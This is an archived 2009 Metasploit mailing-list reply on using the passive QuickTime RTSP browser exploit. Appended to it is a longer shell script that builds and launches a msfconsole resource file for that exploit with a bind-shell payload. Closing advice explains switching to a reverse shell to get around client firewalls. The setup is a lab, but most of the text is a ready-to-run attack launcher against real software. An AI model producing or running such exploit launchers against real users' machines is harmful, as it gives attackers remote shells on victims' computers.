Metasploit mailing list archives

query on exploit/windows/browser/apple_quicktime_rtsp


From: patrick at aushack.com (Patrick Webster)
Date: Mon, 9 Feb 2009 16:45:32 +1100

Yep, it is a passive exploit. The job is started, waiting for a
vulnerable client with a browser to connect with a vulnerable version
of QuickTime installed.

The job will send the trigger to the client as HTML/XML, then overflow
QuickTime, and the payload will connect with a session.

One note:

SRVHOST should be the IP that the XP box will be connecting to (the
BT3 instance).
SRVPORT is the HTTP server port (usually 80)

If you're using shell_bind_tcp, check LPORT which is the actual port
the payload will listen on. This is 4444 by default.

-Patrick
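The setup the reply describes (a passive browser module started as a job, SRVHOST/SRVPORT for the HTTP server the XP client connects to, LPORT for the bind-shell payload on the client) written out as a msfconsole resource script. This is an added example and not code from the thread or from the Metasploit project: the module path, option names and the shell_bind_tcp payload are those named in the post; the address 192.168.1.10 standing in for the BT3 box, the file name qt_rtsp.rc, the LAUNCH variable and the helper function names are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): build and sanity-check a
# Metasploit resource file for the passive QuickTime RTSP browser module,
# then optionally start msfconsole with it.

# Emit the msfconsole commands for the job described in the post.
# $1 = SRVHOST (address the XP client will connect to: the attacker box)
# $2 = SRVPORT (HTTP server port, 80 in the post)
# $3 = LPORT   (port the bind-shell payload listens on, 4444 by default)
build_rc() {
    cat <<EOF
use exploit/windows/browser/apple_quicktime_rtsp
set SRVHOST $1
set SRVPORT $2
set PAYLOAD windows/shell_bind_tcp
set LPORT $3
exploit -j -z
EOF
}

# SRVHOST must be a literal IPv4 address the attacker box holds, not a
# hostname: the trigger page tells the client where to come back to.
valid_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|*..*|.*|*.) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] 2>/dev/null || return 1
    done
    return 0
}

# A TCP port is an integer in 1..65535.
valid_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Validate the three options and write the resource file ($4).
write_rc() {
    valid_ipv4 "$1" || { echo "SRVHOST must be the attacker's IPv4 address, got '$1'" >&2; return 1; }
    valid_port "$2" && valid_port "$3" || { echo "SRVPORT/LPORT must be TCP ports" >&2; return 1; }
    build_rc "$1" "$2" "$3" > "$4"
}

# Usage on the attacker box (assumed address 192.168.1.10):
#   LAUNCH=1 SRVHOST=192.168.1.10 sh qt_rtsp.sh
# Without LAUNCH=1 the script only defines the functions above.
if [ "${LAUNCH:-0}" = 1 ]; then
    write_rc "${SRVHOST:-192.168.1.10}" "${SRVPORT:-80}" "${LPORT:-4444}" qt_rtsp.rc || exit 1
    msfconsole -r qt_rtsp.rc
fi
```

`exploit -j -z` starts the module as a background job without dropping into a session, which is what a passive server module wants; the session appears when a vulnerable client browses to http://SRVHOST:SRVPORT/. Because windows/shell_bind_tcp listens on the XP client, the framework connects out to the client's LPORT after the overflow, so a host firewall on the client that blocks inbound 4444 will leave the exploit firing without a session; a reverse payload (windows/shell_reverse_tcp with LHOST set to the attacker's address) avoids that dependency.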
